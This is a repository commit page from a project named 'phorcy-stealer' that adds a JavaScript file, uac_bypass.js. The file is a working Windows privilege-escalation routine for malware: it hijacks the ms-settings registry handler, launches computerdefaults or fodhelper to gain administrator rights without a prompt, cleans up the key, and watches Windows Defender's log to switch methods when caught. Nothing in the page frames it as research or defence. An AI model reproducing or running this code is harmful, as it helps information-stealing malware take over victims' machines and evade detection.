whiskers/phorcy-stealer
4
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
voyqge
2023-12-03 16:37:37 +01:00
committed by GitHub
parent ed08a4616c
commit 008a8cea98
1 changed files with 56 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

56
Utils/uac_bypass.js Normal file
View File

@@ -0,0 +1,56 @@
const { execSync } = require('child_process');
const os = require('os');
function UACbypass(method = 1) {
const execute = (cmd) => execSync(cmd, { shell: true, stdio: 'pipe' }).toString();
if (GetSelf()[1]) {
if (method === 1 || method === 2) {
const executable = process.execPath.replace(/\\/g, '\\\\');
execute(`reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /d "${executable}" /f`);
execute('reg add hkcu\\Software\\Classes\\ms-settings\\shell\\open\\command /v "DelegateExecute" /f');
const logCountBefore = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
if (method === 1) {
execute('computerdefaults --nouacbypass');
} else if (method === 2) {
execute('fodhelper --nouacbypass');
}
const logCountAfter = execute('wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text').split('\n').length;
execute('reg delete hkcu\\Software\\Classes\\ms-settings /f');
if (logCountAfter > logCountBefore) {
return UACbypass(method + 1);
}
} else {
return false;
}
return true;
}
}
function IsAdmin() {
return os.userInfo().username === 'Administrator';
}
function GetSelf() {
if (process.pkg) {
return [process.execPath, true];
} else {
return [__filename, false];
}
}
if (require.main === module) {
if (IsAdmin()) {
console.log("Already running with admin privileges.");
} else {
console.log("Running without admin privileges. Trying to bypass UAC...");
const bypassSuccessful = UACbypass();
if (bypassSuccessful) {
console.log("UAC bypass successful.");
} else {
console.log("UAC bypass unsuccessful.");
}
}
}